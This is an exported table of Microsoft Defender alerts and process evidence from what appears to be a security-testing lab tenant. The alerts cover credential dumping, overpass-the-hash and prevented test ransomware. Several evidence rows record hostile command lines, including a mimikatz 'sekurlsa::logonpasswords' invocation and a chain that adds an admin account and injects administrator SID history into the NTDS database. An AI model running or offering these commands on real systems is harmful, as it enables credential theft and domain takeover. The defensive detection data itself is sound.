null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-11-11T08:19:56.86Z | Suspicious | None | SYSTEM | NT AUTHORITY | S-1-5-18 | null | null | f309b61a8b005b5ce0a3fb58caaa798cfc95f5db | 3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748 | PSEXESVC.exe | C:\Windows | 268 | curl http://malicious | 2022-11-11T08:17:57.8297749Z | 680 | 2022-11-10T17:17:06.0160973Z | services.exe | C:\Windows\System32 | Detected | e138ecd8e7b21eaf952cb35d56349bf50c64ac96 |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-08T10:33:23.95Z | Suspicious | None | darol | test.domain | S-1-5-21-2300221942-1987151257-321556088-1110 | 598763ac-48bb-4671-9472-6be219756e33 | darol@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-11-21T02:03:41.86Z | Suspicious | Active | admin | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | 56d2d9f6c4b44cfedcf71a86ed68cd859e5c692d | 8c75757111b8bc8bd0730fabe3c99f73f08169dfd54ed6a64dcf983dc53fec4b | explorer.exe | C:\Windows | 4,680 | Explorer.EXE | 2022-11-10T07:07:26.0872385Z | 4,684 | 2022-11-10T07:07:25.9825113Z | userinit.exe | null | Detected | c7e147cb0eb3534a4dcea5acb8e61c933713b145 |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-21T04:13:22.6633333Z | 5 | None | bob | null | S-1-5-21-2300221942-1987151257-321556088-502 | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638045931470659526_1077639846 | 58f9697c-4be9-4140-af1f-34d50cbbe085 | 765 | MicrosoftDefenderForEndpoint | 2022-11-21T02:05:47.0659755Z | 2022-11-26T01:35:43.17Z | 2022-11-26T01:35:43.0633333Z | 2022-11-21T02:02:27.1005817Z | 2022-11-21T02:15:09.1240511Z | Malicious credential theft tool execution detected | A known credential theft tool execution command line was detected.
Either the process itself or its command line indicated an intent to dump users' credentials, keys, plain-text passwords and more. | CredentialAccess | Resolved | High | null | UnsupportedAlertType | TruePositive | SecurityTesting | WindowsDefenderAtp | f5d3c5d8-ec3a-4412-ab45-934d8faff42c | takeshi@msdxv2.m365dpoc.com | null | null | [
"T1003"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDev... | [
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-21T02:05:47.11Z",
"fileName": null,
"filePath": null,
"ipAddress": ... | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-14T13:13:04.8233333Z | Suspicious | None | user1 | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1110 | 598763ac-48bb-4671-9472-6be219756e33 | darol@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-13T17:36:54.33Z | Suspicious | None | alice | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1110 | 598763ac-48bb-4671-9472-6be219756e33 | darol@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-18T05:12:05.38Z | Suspicious | None | ronhd | staging.net | S-1-5-21-2300221942-1987151257-321556088-1111 | 89b6fc86-af84-47b2-a72d-325362598b2c | ronhd@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638072963593489455_-1122334665 | c499c60d-d12f-4c46-8b3f-efeb93bb9209 | 975 | MicrosoftDefenderForEndpoint | 2022-12-22T08:59:19.3489647Z | 2022-12-22T08:59:20.0333333Z | null | 2022-12-22T08:47:50.7095101Z | 2022-12-22T08:47:50.7095101Z | Password hashes dumped from LSASS memory | LSASS process memory has been read to obtain password hashes, indicating possible credential theft. Attackers can use hashes obtained from LSASS process memory to impersonate or perform actions on behalf of logged on or recently logged on users. | CredentialAccess | New | Medium | null | UnsupportedAlertType | null | null | WindowsDefenderAtp | 2ed33edd-2c33-49fd-877b-ab73fba14d59 | null | null | null | [
"T1003",
"T1003.001"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv8-win10v.msdxv8.m365dpoc.com",
"firstSeen": "2022-12-08T05:21:19.944Z",
"healthStatus": "Active",
"loggedOnUsers": [],
"mdatpDeviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"onboardingStatus": "Onboar... | [
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "MSDXV8",
"entityType": "User",
"evidenceCreationTime": "2022-12-22T08:59:19.3833333Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime":... | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-09-30T06:14:46.34Z | Suspicious | None | guest | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-12-22T08:48:30.9266667Z | Suspicious | None | jeff | MSDXV8 | S-1-5-21-2159906967-4174806019-1002223092-1104 | null | jeff@msdxv8.m365dpoc.com | 56d2d9f6c4b44cfedcf71a86ed68cd859e5c692d | 8c75757111b8bc8bd0730fabe3c99f73f08169dfd54ed6a64dcf983dc53fec4b | explorer.exe | C:\Windows | 1,896 | type secret.txt | 2022-12-22T08:26:24.0772409Z | 2,796 | 2022-12-22T08:26:23.9030784Z | userinit.exe | C:\Windows\System32 | Detected | 7ba8aa008687dd62d639cb45b52c7c9f971c65c1 |
da638045938683943421_1830318078 | da638045938683943421_1830318078 | 765 | MicrosoftDefenderForEndpoint | 2022-11-21T02:17:48.3944641Z | 2022-11-21T02:19:23.2233333Z | null | 2022-11-21T02:01:39.5403186Z | 2022-11-21T02:05:26.7380973Z | Command line used for possible overpass-the-hash | A suspicious command line might have been used to perform an overpass-the-hash attack. This attack typically involves obtaining a password hash from memory and then using the ticket to authenticate. | LateralMovement | New | Medium | null | UnsupportedAlertType | null | null | MTP | 79ae2f5c-7394-4224-bae2-18fa2c975eec | null | null | null | [
"T1550.002",
"T1550.003"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "corp.local",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "c7e147cb0eb353... | [
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:17:48.44Z",
"fileName": "mimikatz.exe",
"filePath": "",
"ipAddress": null,
"parentProcessCreationTime... | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-11-21T02:11:51.33Z | Benign | None | steve | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1107 | 0808dea1-2ec8-41d2-8e3e-7c18309fab09 | steve@msdxv2.m365dpoc.com | ded8fd7f36417f66eb6ada10e0c0d7c0022986e9 | bc866cfcdda37e24dc2634dc282c7a0e6f55209da17a8fa105b07414c0e7c527 | cmd.exe | C:\Windows\System32 | 3,020 | "cmd" /c "net.exe user /add BDAdmin Password1! && net.exe stop ntds /y && powershell.exe -Command "Add-ADDBSidHistory -SamAccountName BDAdmin -SidHistory \"S-1-5-32-544\" -DatabasePath (Get-ItemProperty -Path Registry::HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters).\"DSA Database file\"" && net.exe start ntds" | 2022-11-21T02:07:15.6313121Z | 7,232 | 2022-11-21T02:07:15.1389846Z | PSEXESVC.exe | C:\Windows | Detected | e138ecd8e7b21eaf952cb35d56349bf50c64ac96 |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-12-22T08:48:24.7566667Z | Suspicious | None | guest | MSDXV8 | S-1-5-21-2159906967-4174806019-1002223092-1104 | null | jeff@msdxv8.m365dpoc.com | 70df765f554ed7392200422c18776b8992c09231 | 912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9 | mimikatz.exe | C:\M365DAttack\Mimikatz\x64 | 7,772 | "mimikatz.exe" privilege::debug sekurlsa::logonpasswords exit | 2022-12-22T08:47:23.3350389Z | 6,324 | 2022-12-22T08:47:11.8139068Z | powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0 | Detected | 7ba8aa008687dd62d639cb45b52c7c9f971c65c1 |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-12-22T08:51:01.6233333Z | Unknown | None | jeff | MSDXV8 | S-1-5-21-2159906967-4174806019-1002223092-1104 | null | jeff@msdxv8.m365dpoc.com | 4f4970c3545972fea2bc1984d597fc810e6321e0 | 25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369 | net.exe | C:\Windows\System32 | 9,092 | "net.exe" user /domain | 2022-12-22T08:47:23.0252128Z | 6,324 | 2022-12-22T08:47:11.8139068Z | powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0 | Detected | 7ba8aa008687dd62d639cb45b52c7c9f971c65c1 |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-11-18T04:51:54.57Z | Malicious | Active | null | null | null | null | null | null | null | Code.exe | \Device\HarddiskVolume3\Users\Takeshi\AppData\Local\Programs\Microsoft VS Code | 12,136 | null | 2022-11-14T04:36:09.1457881Z | null | null | null | null | Detected | 83b06aa80899050e5d4132992e36b5b8f14b64e9 |
da638066012599386025_543146038 | 0bfa195d-7fcb-4c7c-bb2b-be226318ad32 | 794 | MicrosoftDefenderForEndpoint | 2022-12-14T07:54:19.938631Z | 2022-12-14T08:00:01.6766667Z | null | 2022-12-14T07:42:43.5926544Z | 2022-12-14T07:42:43.5926544Z | 'Encryptest' ransomware was prevented | Ransomware use common methods to encrypt files using keys that are known only to attackers. As a result, victims are unable to access the contents of the encrypted files. Most ransomware display or drop a ransom note—an image or an HTML file that contains information about how to obtain the attacker-supplied decryption tool for a fee.
To target documents or other files that contain user data, some ransomware look for files in certain locations and files with certain extension names. It is also common for ransomware to rename encrypted files so that they all use the same extension name.
This detection might indicate that the malware was stopped from delivering its payload. However, it is prudent to check the machine for signs of infection. | Ransomware | New | Medium | 60 | PendingApproval | null | null | WindowsDefenderAv | 51d03c45-b142-4de4-95df-01b0c259d8f6 | null | null | Encryptest | [] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Unknown",
"deviceDnsName": "tmtower-win10b.tmtower.m365dpoc.com",
"firstSeen": "2022-12-14T07:32:33.6902425Z",
"healthStatus": "Active",
"loggedOnUsers": [],
"mdatpDeviceId": "8d6414f0fc6bf2196d54aab4207d4a65873315c6",
"onboardingStatus": "... | [
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Prevented",
"deviceId": "8d6414f0fc6bf2196d54aab4207d4a65873315c6",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-12-14T07:54:19.98Z",
"fileName": "UNSIGNED_ransomware_test_exe.exe",
"filePath... | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638045930950835514_396878374 | 7a8be391-9140-4529-b727-24c7b062077e | 765 | MicrosoftDefenderForEndpoint | 2022-11-21T02:04:55.0835712Z | 2022-11-26T01:35:43.17Z | 2022-11-26T01:35:43.0633333Z | 2022-11-21T02:02:30.8693215Z | 2022-11-21T02:02:30.8693215Z | Malicious credential theft tool execution detected | A known credential theft tool execution command line was detected.
Either the process itself or its command line indicated an intent to dump users' credentials, keys, plain-text passwords and more. | CredentialAccess | Resolved | High | null | UnsupportedAlertType | TruePositive | SecurityTesting | WindowsDefenderAtp | f5d3c5d8-ec3a-4412-ab45-934d8faff42c | takeshi@msdxv2.m365dpoc.com | null | null | [
"T1003"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "lab.net",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "c7e147cb0eb3534a4... | [
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-21T02:04:55.1233333Z",
"fileName": null,
"filePath": null,
"ipAddre... | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-14T13:52:02.9766667Z | Suspicious | None | operator | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1110 | 598763ac-48bb-4671-9472-6be219756e33 | darol@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-11-21T02:08:06.97Z | Suspicious | None | jeff | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | 70df765f554ed7392200422c18776b8992c09231 | 912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9 | mimikatz.exe | C:\M365DAttack\Mimikatz\x64 | 6,948 | dir C:\ | 2022-11-21T02:06:53.9715954Z | 11,068 | 2022-11-21T02:01:28.4753286Z | powershell.exe | \Device\HarddiskVolume4\Windows\System32\WindowsPowerShell\v1.0 | Detected | c7e147cb0eb3534a4dcea5acb8e61c933713b145 |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-14T14:15:25.2233333Z | Suspicious | None | root | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1110 | 598763ac-48bb-4671-9472-6be219756e33 | darol@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-11T08:21:09.1466667Z | Suspicious | None | jeff | prod.env | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.